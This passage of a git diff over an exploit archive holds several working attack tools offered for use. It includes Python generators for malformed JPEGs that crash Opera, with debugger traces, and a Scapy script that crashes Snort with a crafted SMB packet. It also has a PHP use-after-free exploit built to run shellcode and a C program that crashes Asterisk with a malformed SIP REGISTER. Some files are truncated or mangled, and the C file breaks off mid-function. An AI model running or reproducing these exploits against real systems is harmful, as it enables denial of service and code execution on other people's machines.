Note, that we also overwrite the JPEG end +marker FF D9. + +After executing this JPEG file with Opera, Opera immediatly allocates memory +until the max page size value is reached, but it doesn't stop. + +Note that some third party applications could also crash during this process, +in my case Antivir crashed with a "read memory" error. + + +# File: pavarotti.py +# ATTENTION, THIS COULD DAMAGE YOUR RUNNING SYSTEM! +bytes = [ + 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, + 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, + 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, + 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, + 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x01, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x41, + 0x41, 0x41, 0x41, 0x03, 0x41, 0x41, 0x41, 0x41, 0x11, 0x41, 0x41, 0x41, 0x41, + 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x01, 0x01, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0xFF, + 0xDA, 0x00, 0x0C, 0x01, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x11, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41] + +f = open(__file__+".jpg", "wb") +for byte in bytes: f.write("%c" % byte) +f.close() +print __file__+".jpg created! (%d bytes)" % len(bytes) +# eof + +F:\vulndev\Opera> python pavarotti.py +pavarotti.py.jpg created! (637 bytes) +F:\vulndev\Opera> opera pavarotti.py.jpg + + +As said, this could be also interesting on mobile phones with Opera Mini. The +user has no real control to kill the Opera process, which should result in a +phone reboot. This was not tested. + + + ************************************************** + + +Further vulnerabilities +----------------------- + +The arrows mark the components whose datatypes are not properly validated by +Opera. + + +Segment: Start Of Frame (SOF) + +SOF: FF C0 +Length: 00 11 +Strictness: 08 +Image Hori.: 00 01 +Image Vert.: 00 01 +Components: 03 +Data of component: + - component number: 01 + - 4Bit hori., 4Bit vert., sample factor: 22 + - Number of quantisation table: 00 <- + + - component number: 02 + - 4Bit hori., 4Bit vert., sample factor: 11 + - Number of quantisation table: 01 <- + + - component number: 03 + - 4Bit hori., 4Bit vert., sample factor: 11 + - Number of quantisation table: 01 <- + + +The item "Number of quantisation table" of the first component is changed to +FFh in the below file. 
+ + +# File: sof-quanttable.py +bytes = [ + 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, + 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, + 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, + 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, + 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12, + 0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26, + 0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C, + 0x20, 0x26, 0x18, 0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B, + 0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + + 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, + 0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0xFF, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, + 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x01, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, + 0xDA, 0x00, 0x0C, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, + 0xB3, 0x00, 0x1F, 0xFF, 0xD9 ] + + +f = open(__file__+".jpg", "wb") +for byte in bytes: f.write("%c" % byte) 
+f.close() +print __file__+".jpg created! (%d bytes)" % len(bytes) +# eof + +F:\vulndev\Opera> python sof-quanttable.py +sof-quanttable.py.jpg created! (304 bytes) +F:\vulndev\Opera> + + +(ntdll) +7C9211D5 mov eax, dword ptr ds:[esi+C] +7C9211D8 mov dword ptr ss:[ebp-98], eax +7C9211DE mov edx, dword ptr ds:[eax] ; <-- CRASH + +EAX 01010101 +ECX 00EB2780 +EDX 00930178 +EBX 00930000 +ESP 0012EC94 +EBP 0012EEB4 +ESI 00EB2778 +EDI 01010101 +EIP 7C9211DE ntdll.7C9211DE + +---- + +Segment: Start Of Scan (SOS) + +SOS: FF DA +Length: 00 0C +Components: 03 +Data of component: + - component number: 01 + - 4Bit DC table, 4Bit AC table: 00 <- + + - component number: 02 + - 4Bit DC table, 4Bit AC table: 11 <- + + - component number: 03 + - 4Bit DC table, 4Bit AC table: 11 <- + + +The item "4Bit DC table, 4Bit AC table" of the first component is changed to +FFh in the below file. + +# File: sos-dcactable.py +bytes = [ + 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, + 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, + 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, + 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, + 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12, + 0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26, + 0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C, + 0x20, 0x26, 0x18, 0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B, + 0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 
0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, + 0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, + 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x01, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, + 0xDA, 0x00, 0x0C, 0x03, 0x01, + 0xFF, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, + 0xB3, 0x00, 0x1F, 0xFF, 0xD9 ] + + +f = open(__file__+".jpg", "wb") +for byte in bytes: f.write("%c" % byte) +f.close() +print __file__+".jpg created! (%d bytes)" % len(bytes) +# eof + +F:\vulndev\Opera> python sos-dcactable.py +sos-dcactable.py.jpg created! (304 bytes) +F:\vulndev\Opera> + + +67AEE715 push ebp +67AEE716 mov ebp, esp +67AEE718 push esi +67AEE719 mov esi, ecx +67AEE71B cmp dword ptr ds:[esi+48], 8 +67AEE71F jge short Opera_12.67AEE733 +67AEE721 push dword ptr ss:[ebp+8] +67AEE724 call Opera_12.67AEE7FE +67AEE729 cmp dword ptr ds:[esi+48], 8 +67AEE72D jge short Opera_12.67AEE733 +67AEE72F push 1 +67AEE731 jmp short Opera_12.67AEE75E +67AEE733 mov eax, dword ptr ds:[esi+44] ; ds=B3001F00 (end part of jpeg file) +67AEE736 mov ecx, dword ptr ds:[esi+24] +67AEE739 shr eax, 18 +67AEE73C add eax, ecx ; +67AEE73E movzx ecx, byte ptr ds:[eax+60] ; <-- CRASH + +EAX 000000B2 +ECX FFFFFFFF +EDX 00EE2534 +EBX 00000005 +ESP 0012ECB0 +EBP 0012ECB4 +ESI 00EE2534 +EDI 00EE2534 +EIP 67AEE73E Opera_12.67AEE73E + + + ************************************************** + +# milw0rm.com [2007-01-08] diff --git a/platforms/multiple/dos/3362.py b/platforms/multiple/dos/3362.py index 768b1b6a6..bf3f5cc15 100755 
--- a/platforms/multiple/dos/3362.py
+++ b/platforms/multiple/dos/3362.py
@@ -1,76 +1,76 @@
-#!/usr/bin/python
-#
-# Snort DCE/RPC Preprocessor Buffer Overflow (DoS)
-#
-# Author: Trirat Puttaraksa
-#
-# http://sf-freedom.blogspot.com
-#
-######################################################
-# For educational purpose only
-#
-# This exploit just crash Snort 2.6.1 on Fedora Core 4. However, Code Execution
-# may be possible, but I have no time to make it :(
-# I will post the information about this vulnerability in my blog soon
-#
-# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/)
-# to inject the packet, so you have to install Scapy before use it.
-#
-#######################################################
-
-import sys
-from scapy import *
-from struct import pack
-conf.verb = 0
-
-# NetBIOS Session Service
-payload = "\x00\x00\x01\xa6"
-
-# SMB Header
-payload += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
-payload += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
-payload += "\x00\x08\x30\x00"
-
-# Tree Connect AndX Request
-payload += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
-payload += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
-payload += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
-payload += "\x3f\x3f\x3f\x3f\x3f\x00"
-
-# NT Create AndX Request
-payload += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
-payload += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-payload += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
-payload += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
-payload += "\x63\x00\x00\x00"
-
-# Write AndX Request #1
-payload += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
-payload += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
-
-payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00"
-payload += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
-payload += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
-payload += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
-payload += "\x2b\x10\x48\x60\x02\x00\x00\x00"
-
-# Write AndX Request #2
-payload += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
-payload += "\x00\x48\x00\x00\x00\xff\x01\x30\x01\x00\x00\x00\x00\x49\x00\xee"
-
-payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00"
-payload += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
-payload += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
-payload += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
-payload += "\x2b\x10\x48\x60\x02\x00\x00\x00"
-
-if len(sys.argv) != 2:
- print "Usage snort_dos_dcerpc.py "
- sys.exit(1)
-
-target = sys.argv[1]
-
-p = IP(dst=target) / TCP(sport=1025, dport=139, flags="PA") / payload
-send(p)
-
-# milw0rm.com [2007-02-23]
+#!/usr/bin/python
+#
+# Snort DCE/RPC Preprocessor Buffer Overflow (DoS)
+#
+# Author: Trirat Puttaraksa
+#
+# http://sf-freedom.blogspot.com
+#
+######################################################
+# For educational purpose only
+#
+# This exploit just crash Snort 2.6.1 on Fedora Core 4. However, Code Execution
+# may be possible, but I have no time to make it :(
+# I will post the information about this vulnerability in my blog soon
+#
+# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/)
+# to inject the packet, so you have to install Scapy before use it.
+#
+#######################################################
+
+import sys
+from scapy import *
+from struct import pack
+conf.verb = 0
+
+# NetBIOS Session Service
+payload = "\x00\x00\x01\xa6"
+
+# SMB Header
+payload += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
+payload += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
+payload += "\x00\x08\x30\x00"
+
+# Tree Connect AndX Request
+payload += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
+payload += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
+payload += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
+payload += "\x3f\x3f\x3f\x3f\x3f\x00"
+
+# NT Create AndX Request
+payload += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
+payload += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+payload += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
+payload += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
+payload += "\x63\x00\x00\x00"
+
+# Write AndX Request #1
+payload += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
+payload += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
+
+payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00"
+payload += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
+payload += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
+payload += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
+payload += "\x2b\x10\x48\x60\x02\x00\x00\x00"
+
+# Write AndX Request #2
+payload += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
+payload += "\x00\x48\x00\x00\x00\xff\x01\x30\x01\x00\x00\x00\x00\x49\x00\xee"
+
+payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00"
+payload += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
+payload += 
"\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
+payload += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
+payload += "\x2b\x10\x48\x60\x02\x00\x00\x00"
+
+if len(sys.argv) != 2:
+ print "Usage snort_dos_dcerpc.py "
+ sys.exit(1)
+
+target = sys.argv[1]
+
+p = IP(dst=target) / TCP(sport=1025, dport=139, flags="PA") / payload
+send(p)
+
+# milw0rm.com [2007-02-23]
diff --git a/platforms/multiple/dos/3394.php b/platforms/multiple/dos/3394.php
index 11429d38c..dca867005 100755
--- a/platforms/multiple/dos/3394.php
+++ b/platforms/multiple/dos/3394.php
@@ -1,71 +1,71 @@ - Refcount drops down to 0 - // => String gets freed - // 4) Free some more zvals - // 5) Create a new array with one element - // => Put shellcode in the key - // => Hashtable struct will be in the same place as the string - // 6) Use string to directly access the content of the Hashtable - // => Read pointer to first bucket - // => Add 32 bytes, offset to array key - // => Write pointer to the destructor field - // 7) Unset array => Executes code in $shellcode - - //////////////////////////////////////////////////////////////////////// - // If you touch anything below this line you have to debug it yourself - //////////////////////////////////////////////////////////////////////// - - $________________________str = str_repeat("A", 39); - $________________________yyy = &$________________________str; - $________________________xxx = &$________________________str; - for ($i = 0; $i < 65534; $i++) $arr[] = &$________________________str; - $________________________aaa = " XXXXX "; - $________________________aab = " XXXx.xXXX "; - $________________________aac = " XXXx.xXXX "; - $________________________aad = " XXXXX "; - unset($________________________xxx); - unset($________________________aaa); - unset($________________________aab); - unset($________________________aac); - unset($________________________aad); - $arr = array($shellcode => 1); - - $addr = unpack("L", substr($________________________str, 6*4, 4)); - $addr = $addr[1] + 32; - $addr = pack("L", $addr); - - for ($i=0; $i - -# milw0rm.com [2007-03-01] + Refcount drops down to 0 + // => String gets freed + // 4) Free some more zvals + // 5) Create a new array with one element + // => Put shellcode in the key + // => Hashtable struct will be in the same place as the string + // 6) Use string to directly access the content of the Hashtable + // => Read pointer to first bucket + // => Add 32 bytes, offset to array key + // => Write pointer to the destructor field + // 7) Unset array => Executes 
code in $shellcode + + //////////////////////////////////////////////////////////////////////// + // If you touch anything below this line you have to debug it yourself + //////////////////////////////////////////////////////////////////////// + + $________________________str = str_repeat("A", 39); + $________________________yyy = &$________________________str; + $________________________xxx = &$________________________str; + for ($i = 0; $i < 65534; $i++) $arr[] = &$________________________str; + $________________________aaa = " XXXXX "; + $________________________aab = " XXXx.xXXX "; + $________________________aac = " XXXx.xXXX "; + $________________________aad = " XXXXX "; + unset($________________________xxx); + unset($________________________aaa); + unset($________________________aab); + unset($________________________aac); + unset($________________________aad); + $arr = array($shellcode => 1); + + $addr = unpack("L", substr($________________________str, 6*4, 4)); + $addr = $addr[1] + 32; + $addr = pack("L", $addr); + + for ($i=0; $i + +# milw0rm.com [2007-03-01] diff --git a/platforms/multiple/dos/3404.php b/platforms/multiple/dos/3404.php index f6beb955c..2cb4f3921 100755 --- a/platforms/multiple/dos/3404.php +++ b/platforms/multiple/dos/3404.php @@ -1,31 +1,31 @@ -
- - - AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC - - - - "); -?> - -# milw0rm.com [2007-03-04] +
+ + + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC + + + + "); +?> + +# milw0rm.com [2007-03-04] diff --git a/platforms/multiple/dos/3407.c b/platforms/multiple/dos/3407.c index dc7a23084..669abd2bf 100755 --- a/platforms/multiple/dos/3407.c +++ b/platforms/multiple/dos/3407.c 
@@ -1,126 +1,126 @@ -/* -this will cause asterisk to segfault, -the bug that this exploits has been patched in release 1.2.16 & 1.4.1 - -CLI> - -Program received signal SIGSEGV, Segmentation fault. -[Switching to Thread 1082719152 (LWP 2510)] -register_verify (p=0x81cf600, sin=0x4088e750, req=0x4088e760, uri=0x0) - at chan_sip.c:8257 -8257 while (*t && *t > ' ' && *t != ';') -(gdb) - - -build: -gcc -o asterisk-sip-killer asterisk-sip-killer.c - -run: -./asterisk-sip-killer -h - -*/ -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define SIP_UDP_PORT 5060 - -struct udp_session { - int sd; - struct sockaddr_in saddr; -}; - -int make_udp(struct udp_session *p, char *remotehost, int port) -{ - int sd; - int ret; - struct sockaddr_in saddr; - struct hostent *he; - - sd = socket(AF_INET,SOCK_DGRAM,0); - - if (sd == -1) { - printf("error making socket\n"); - return -1; - } - - he = gethostbyname(remotehost); - - saddr.sin_family = AF_INET; - saddr.sin_port = htons(port); - saddr.sin_addr.s_addr = inet_addr(remotehost); - memset(&(saddr.sin_zero), '\0', 8); - p->sd = sd; - memcpy(&p->saddr,&saddr,sizeof(struct sockaddr_in)); - - printf("udp socket ready\n"); - - return 0; -} - -void kill_asterisk(struct udp_session *sess) -{ - int ret; - char *p = - "REGISTER \r\n" - "Via: SIP/2.0/UDP 192.168.204.130:5060;branch=z9hG4bK1d97e14f\r\n" - "Max-Forwards: 70\r\n" - "From: ;tag=as253946cf\r\n" - "To: \r\n" - "Call-ID: 7e64a49e5cf018231228938050e43d3b@127.0.0.1\r\n" - "CSeq: 104 REGISTER\r\n" - "User-Agent: Asterisk PBX\r\n" - "Expires: 120\r\n" - "Contact: \r\n" - "Event: registration\r\n" - "Content-Length: 0\r\n"; - - ret = sendto(sess->sd, p, strlen(p), 0, - (struct sockaddr *)&sess->saddr, - sizeof(struct sockaddr)); - - if (ret) { - printf("You may have well shutdown a asterisk server\n"); - } else { - printf("there was a issue sending the request\n"); - return; - } - return; -} -int main(int argc, char **argv) -{ - int i = 0; - 
